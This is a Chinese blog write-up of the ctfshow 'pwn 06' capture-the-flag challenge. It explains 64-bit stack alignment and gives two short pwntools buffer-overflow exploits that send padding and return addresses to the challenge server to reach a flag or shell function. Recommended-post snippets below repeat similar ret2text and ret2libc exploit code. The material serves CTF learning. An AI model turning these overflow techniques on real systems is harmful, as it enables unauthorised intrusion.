ctfshow pwn 06

已于 2023-04-14 10:42:29 修改
阅读量223 收藏 1
点赞数 3
文章标签: 网络安全 安全 系统安全 安全威胁分析 安全架构
于 2023-04-14 10:15:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A2247328295/article/details/130146561
版权

堆栈平衡

在调用函数时,保证esp能正确恢复入栈之前的状态
推荐文章
堆栈平衡

PWN 06

可以看到这是一个64位的程序,需要考虑堆栈平衡
在这里插入图片描述
welcome函数和main函数就不看了,直接看getflag函数
在这里插入图片描述
这里需要将payload的先指向retn的地址维持堆栈平衡,最后添加函数的首地址,64位的用cyclic计算偏移的时候地址用后8位,记得加0x
在这里插入图片描述

exp

from pwn import *
p = remote("pwn.challenge.ctf.show",28103)
payload = b'a'*(0xc+8) + p64(0x40058E) + p64(0x400577)
p.sendline(payload)
p.interactive()

exp很简单就不解释了,当然这里还可以这样实现,我们直接将地址指向 bin/sh

exp2

from pwn import *
p = remote("pwn.challenge.ctf.show",28103)
payload = b'a'*(0xc+8) + p64(0x400578)
p.sendline(payload)
p.interactive()
czjtzdbk
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow pwn6
qq_39980610的博客
08-22 405
函数栈平衡:保证函数调用前后的栈顶是一致的。所以exp基本一样但是要注意栈平衡。其实就是要进出都是esp(32位)已经提示了是pwn05的64位版。1.外平栈:由函数外部保持栈平衡。2.内平栈:由函数内部保持栈平衡。或者简单理解为函数要正确退出。
PWN-PRACTICE-CTFSHOW-6
P1umH0的博客
01-18 1723
PWN-PRACTICE-CTFSHOW-636D杯-MengxinStack36D杯-tang1024杯-1024_happy_stack1024杯-1024_happy_checkin 36D杯-MengxinStack 程序开了canary和PIE保护 泄露远程libc版本,为 libc6_2.23-0ubuntu10_amd64.so from pwn import * io=remote("pwn.challenge.ctf.show",28124) io.recvuntil("She said:
CTF PWN入坑
Alan-WalkBill的博客
11-17 3071
CTF PWN入门(一) 1.攻防世界get_shell 将下载好的附件用在Linux中打开命令是./ 文件名 发现没有权限,原来需要先添加权限可使用chmod +x ./ 文件名。 然后nc -nv 111.198.29.45 55973链接到远程主机 ***更多chmod介绍https://www.cnblogs.com/peida/archive/2012/11/29/2794010.htm...
ctfshow pwn
zip471642048的博客
06-04 438
ctfshow pwn系列
pwn06(关于64位程序堆栈平衡的处理)
Welcome To Myon'Blog !
07-07 921
堆栈平衡: 当我们在堆栈中进行堆栈的操作的时候,一定要保证在RET这条指令之前,ESP指向的是我们压入栈中的地址,函数执行到ret执行之前,堆栈栈顶的地址 一定要是call指令的下一个地址。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3454
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
CTFshow-PWN-前置基础(pwn6-pwn9)
最新发布
Welcome To Myon'Blog !
04-15 477
立即寻址方式结束后eax寄存器的值为?截取关键代码mov 用于赋值,将右边立即数加载到左边的寄存器 eax 中;add 将寄存器 eax 中的值与立即数 114504 相加,并将结果存储回寄存器eax中;sub 从寄存器eax中的值中减去1,并将结果存储回寄存器eax中。
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1167
CTFshow-pwn入门-前置基础-pwn5-pwn12
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9448
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 5913
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
ctfshow 基础pwn wp
n1ptune__的博客
05-29 697
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
CTFshow-webPWN
i_kei的博客
11-10 516
WEBpwn_1 将组件放置成如图所示 通电即可获得flag WEBpwn_2 将组件放置成如图所示 通电即可获得flag
CTFSHOW 36D杯CTF(pwn部分wp)
weixin_44296844的博客
05-04 1762
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8124
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值